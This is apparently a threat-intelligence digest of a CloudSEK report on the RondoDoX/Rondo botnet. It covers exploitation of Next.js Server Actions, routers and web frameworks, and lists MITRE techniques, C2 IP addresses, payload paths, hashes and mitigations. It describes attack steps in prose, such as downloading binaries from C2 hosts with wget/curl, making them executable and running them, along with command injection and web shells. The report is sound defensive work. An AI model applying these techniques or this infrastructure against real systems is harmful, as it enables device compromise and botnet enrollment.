CloudSEK recovered nine months of exposed RondoDoX/Rondo botnet C2 logs that document a three‑phase campaign evolving from reconnaissance and web‑app exploitation to large‑scale IoT botnet deployment and a December 2025 Next.js Server Actions RCE wave. The activity included automated command-injection and deserialization attacks, mass binary downloads (e.g., /nuts/poop) from C2s such as 51.81.104.115 and 5.255.121.141, and repeated exploitation of internet‑facing routers and Next.js servers #Rondo #NextJS
Keypoints
- CloudSEK analyzed exposed botnet C2 logs spanning March–December 2025 that revealed three distinct operational phases: reconnaissance, web application exploitation, and IoT botnet deployment.
- Rondo is the primary malware family with 10+ variants and multi‑architecture payloads (x86, x86_64, MIPS, ARM, PowerPC) delivered via wget/curl/tftp/ftp fallbacks.
- Next.js Server Actions prototype/deserialization RCE became the dominant attack vector starting 13 December 2025, with hourly exploitation attempts and rapid infrastructure shifts by the actor.
- Confirmed C2 infrastructure includes multiple IPs (e.g., 74.194.191.52, 51.81.104.115, 5.255.121.141) used to host payloads like /nuts/poop and /nuts/x86 (Mirai), plus loaders and persistence scripts.
- The campaign combined web‑app exploits (SQLi, Struts2 OGNL, Java deserialization, WebLogic, WordPress/Drupal vectors) to pivot into IoT devices (routers, cameras) and enroll them into botnets and cryptomining operations.
- Recommended mitigations include immediate Next.js Server Actions audits/patching, IoT segmentation and hardening, WAF rules to block command-injection patterns, blocking identified C2s at perimeter, and behavioral monitoring for persistence indicators.
MITRE Techniques
- [T1190 ] Exploit Public-Facing Application – Used to exploit web frameworks and services (Next.js, Struts2, WebLogic, Drupal, WordPress) to achieve RCE; (‘SQL Injection testing:’)
- [T1059.004 ] Command and Scripting Interpreter: Unix Shell – Command injection and shell execution observed on routers and web panels to run diagnostic commands and download binaries; (‘Router diagnostic command injection:’)
- [T1190 ] Exploit Public-Facing Application – Java deserialization was tested and exploited as a vector for remote code execution; (‘Java Deserialization testing:’)
- [T1190 ] Exploit Public-Facing Application – Struts2 OGNL injection was used to gain code execution against vulnerable applications; (‘Struts2 OGNL injection:’)
- [T1505.003 ] Server Software Component: Web Shell – Threat actors deployed and used web shells as a persistence and post‑exploitation mechanism; (‘web shells’)
- [T1105 ] Ingress Tool Transfer – Binary download and execution from C2 (e.g., wget/curl to /tmp/123, chmod +x and background execution) was used to deliver botnet clients and miners; (‘Binary download and execution:’)
- [T1567.002 ] Exfiltration Over Web Service – Blind RCE testing with output exfiltration via redirects and HTTP responses was used to verify and leak command outputs; (‘Blind RCE testing with output exfiltration via redirects’)
- [T1498 ] Network Denial of Service (abuse/poisoning of NTP) – NTP server poisoning and diagnostic abuse were used as part of infrastructure manipulation and device targeting; (‘NTP server poisoning:’)
Indicators of Compromise
- [IP Address ] confirmed C2 infrastructure – 74.194.191.52, 51.81.104.115, and other C2s including 5.255.121.141, 41.231.37.153, 70.184.13.47 (multiple instances documented)
- [URI / Filename ] malicious payload and loader paths – /nuts/poop, /nuts/bolts, /nuts/x86 (used to deliver coinminer/loader/Mirai payloads)
- [File Hash (sha256) ] binary payloads – 895f8dff9cd26424b691a401c92fa7745e693275c38caf6a6aff277eadf2a70b (/nuts/poop coinminer), 858874057e3df990ccd7958a38936545938630410bde0c0c4b116f92733b1ddb (/nuts/x86 Mirai), and 2 more hashes
- [File Name Pattern ] botnet scripts – rondo.[device-type].sh observed deployed to compromised routers (example filename pattern: rondo.linksys.sh)
- [IP Address pivot ] additional C2 pivot discovered via image hash – 5.231.70.66 (found by pivoting on asset hash)
Read more: https://www.cloudsek.com/blog/rondodox-botnet-weaponizes-react2shell